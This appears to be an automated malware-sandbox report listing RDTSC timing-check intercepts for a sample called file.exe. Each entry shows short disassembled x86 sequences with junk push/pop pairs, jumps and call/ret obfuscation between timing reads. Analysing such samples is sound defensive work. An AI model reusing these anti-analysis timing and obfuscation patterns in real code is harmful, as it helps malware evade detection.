                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4896B second address: A48971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5446E second address: A54476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54476 second address: A5447A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5447A second address: A544C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66334h 0x00000007 jmp 00007F374CE66335h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push edi 0x00000010 pushad 0x00000011 jmp 00007F374CE6632Eh 0x00000016 jns 00007F374CE66326h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A544C0 second address: A544CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54613 second address: A54617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54617 second address: A5461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A577FB second address: A577FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57830 second address: A57834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57900 second address: A57905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57905 second address: A5790B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5790B second address: A5790F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57961 second address: A579D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F374C50007Ah 0x0000000e push 00000000h 0x00000010 jns 00007F374C500078h 0x00000016 push F19BD6DDh 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F374C500089h 0x00000024 popad 0x00000025 pop eax 0x00000026 add dword ptr [esp], 0E6429A3h 0x0000002d mov ecx, dword ptr [ebp+122D36B8h] 0x00000033 push 00000003h 0x00000035 mov edx, 56886F21h 0x0000003a push 00000000h 0x0000003c sub dword ptr [ebp+122D34E2h], ecx 0x00000042 push 00000003h 0x00000044 sbb dl, 00000041h 0x00000047 push B023C29Ah 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f js 00007F374C500076h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57ABE second address: A57B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 call 00007F374CE6632Ah 0x0000000c pop edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F374CE66328h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D2805h] 0x0000002f mov edx, dword ptr [ebp+122D36D0h] 0x00000035 push 14918F0Ch 0x0000003a pushad 0x0000003b jno 00007F374CE6632Ch 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F282 second address: A4F28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74AE3 second address: A74AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66337h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74AFE second address: A74B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374C500089h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74B21 second address: A74B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74CC0 second address: A74CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74DFB second address: A74E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F374CE66332h 0x0000000b jbe 00007F374CE66326h 0x00000011 jp 00007F374CE66326h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A754B4 second address: A754DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500088h 0x00000009 jmp 00007F374C50007Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75882 second address: A75886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A442 second address: A6A446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BECA second address: A4BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE6632Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B08 second address: A75B12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B12 second address: A75B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374CE6632Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B21 second address: A75B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B27 second address: A75B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F374CE66337h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76225 second address: A7622B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7622B second address: A7622F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7636D second address: A76371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76371 second address: A76377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767BA second address: A767C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767C0 second address: A767E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F374CE66339h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A767E4 second address: A767E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40414 second address: A4041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DE05 second address: A7DE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E268 second address: A7E271 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3C5 second address: A7D3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D3C9 second address: A7D408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c ja 00007F374CE66326h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F374CE66337h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E599 second address: A7E59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82DDE second address: A82DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F374CE6632Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822DF second address: A822E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822E3 second address: A822F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F374CE6632Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A822F6 second address: A82317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500087h 0x00000009 jns 00007F374C500076h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82317 second address: A82338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F374CE6632Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82338 second address: A8233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A824DD second address: A824F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8293B second address: A82952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C500083h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82952 second address: A82975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE6632Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a je 00007F374CE66326h 0x00000010 jng 00007F374CE66326h 0x00000016 pop edi 0x00000017 pop esi 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82975 second address: A82985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F374C500076h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82985 second address: A8298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8298D second address: A829BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C50007Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F374C500084h 0x00000011 jmp 00007F374C50007Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A829BE second address: A829C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83578 second address: A83587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84284 second address: A8428A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A846AD second address: A846B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A846B9 second address: A846BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84769 second address: A847A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F374C50007Fh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F374C500078h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A847A6 second address: A847B0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84C7A second address: A84C80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87144 second address: A8718A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D35B0h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F374CE66328h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov di, EA01h 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8860D second address: A88612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886CF second address: A886D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886D3 second address: A886D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891CE second address: A891D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891D2 second address: A891E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jl 00007F374C500098h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A891E4 second address: A891E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BBB5 second address: A8BBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BBBA second address: A8BBD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F374CE66333h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7B2 second address: A8F7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F7B6 second address: A8F7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374CE6632Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920B2 second address: A920C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C500080h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A920C6 second address: A920CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94FD9 second address: A95050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F374C500078h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D1AD2h], eax 0x00000029 add ebx, 5EDE6433h 0x0000002f and edi, 1CC7B3BDh 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D35E8h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F374C500078h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D37C8h] 0x0000005f xchg eax, esi 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 ja 00007F374C500076h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96148 second address: A96156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F374CE66326h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A952DA second address: A952DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97032 second address: A97036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98054 second address: A98068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F374C50007Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9723B second address: A97252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374CE66333h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97252 second address: A97256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99014 second address: A99018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99018 second address: A9901E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9901E second address: A99028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F374CE66326h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B124 second address: A9B132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F374C50007Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B132 second address: A9B144 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F374CE66326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B144 second address: A9B148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B261 second address: A9B265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C23E second address: A9C244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B265 second address: A9B2F6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F374CE66328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F374CE66328h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+12472C56h], ebx 0x0000002b push dword ptr fs:[00000000h] 0x00000032 xor dword ptr [ebp+122D194Dh], esi 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+12466F18h] 0x00000045 mov eax, dword ptr [ebp+122D14C5h] 0x0000004b mov dword ptr [ebp+122D2839h], edi 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F374CE66328h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d mov ebx, dword ptr [ebp+1244CBEEh] 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jg 00007F374CE6632Ch 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C244 second address: A9C267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374C500086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D2D6 second address: A9D2E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F374CE66326h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B2F6 second address: A9B300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F374C500076h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E393 second address: A9E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F374CE6632Ch 0x00000012 rdtsc
